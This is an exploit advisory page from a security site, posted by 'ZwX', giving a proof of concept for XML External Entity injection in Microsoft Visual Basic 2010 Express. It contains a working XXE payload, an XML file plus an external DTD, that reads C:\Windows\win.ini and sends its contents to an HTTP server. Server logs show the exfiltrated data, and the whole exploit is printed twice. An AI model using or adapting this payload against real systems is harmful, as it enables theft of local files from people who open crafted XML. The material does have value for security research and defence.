Microsoft Visual Basic 2010 Express XML External Entity Injection

2019.12.04
Credit: ZwX
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection # Exploit Author: ZwX # Exploit Date: 2019-12-03 # Version Software : 10.0.30319.1 RTMRel # Vendor Homepage : https://www.microsoft.com/ # Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express # Tested on OS: Windows 7 [+] Exploit : (PoC) =================== 1) python -m SimpleHTTPServer 8000 2) Create file (.xml) 3) Create file Payload.dtd 4) Open the software Microsoft Visual Basic 2010 5) Drag the file (.xml) in a VB project 6) External Entity Injection Successful [+] XXE.xml : ============== <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "C:\Windows\win.ini"> <!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn> [+] Payload.dtd : ================= <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>"> %all; [+] Result Exploitation : ========================= C:\>python -m SimpleHTTPServer 8000 Serving HTTP on 0.0.0.0 port 8000 ... ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 - ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B %0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 - ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B %0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 - Microsoft Visual Basic 2010 Express - XML External Entity Injection.txt # Exploit Title: Microsoft Visual Basic 2010 Express - XML External Entity Injection # Exploit Author: ZwX # Exploit Date: 2019-12-03 # Version Software : 10.0.30319.1 RTMRel # Vendor Homepage : https://www.microsoft.com/ # Software Link: https://dotnet.developpez.com/telecharger/detail/id/593/Visual-Studio-2010-Express # Tested on OS: Windows 7 [+] Exploit : (PoC) =================== 1) python -m SimpleHTTPServer 8000 2) Create file (.xml) 3) Create file Payload.dtd 4) Open the software Microsoft Visual Basic 2010 5) Drag the file (.xml) in a VB project 6) External Entity Injection Successful [+] XXE.xml : ============== <?xml version="1.0"?> <!DOCTYPE test [ <!ENTITY % file SYSTEM "C:\Windows\win.ini"> <!ENTITY % dtd SYSTEM "http://localhost:8000/payload.dtd"> %dtd;]> <pwn>&send;</pwn> [+] Payload.dtd : ================= <?xml version="1.0" encoding="UTF-8"?> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8000?%file;'>"> %all; [+] Result Exploitation : ========================= C:\>python -m SimpleHTTPServer 8000 Serving HTTP on 0.0.0.0 port 8000 ... ZwX-PC - - [03/Dec/2019 11:14:14] "GET /payload.dtd HTTP/1.1" 200 - ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B %0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo Files%5D%0D%0Acolumns=193;100;60;89;100;160; HTTP/1.1" 301 - ZwX-PC - - [03/Dec/2019 11:14:14] "GET /?;%20for%2016-bit%20app%20support%0D%0A%5Bfonts%5D%0D%0A%5Bextensions%5D%0D%0A%5Bmci%20extensions%5D%0D%0A%5B %0Aaac=MPEGVideo%0D%0Aadt=MPEGVideo%0D%0Aadts=MPEGVideo%0D%0Am2t=MPEGVideo%0D%0Am2ts=MPEGVideo%0D%0Am2v=MPEGVideo%0D%0Am4a=MPEGVideo%0D%0Am4v=MPEGVideo Files%5D%0D%0Acolumns=193;100;60;89;100;160;/ HTTP/1.1" 200 -


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top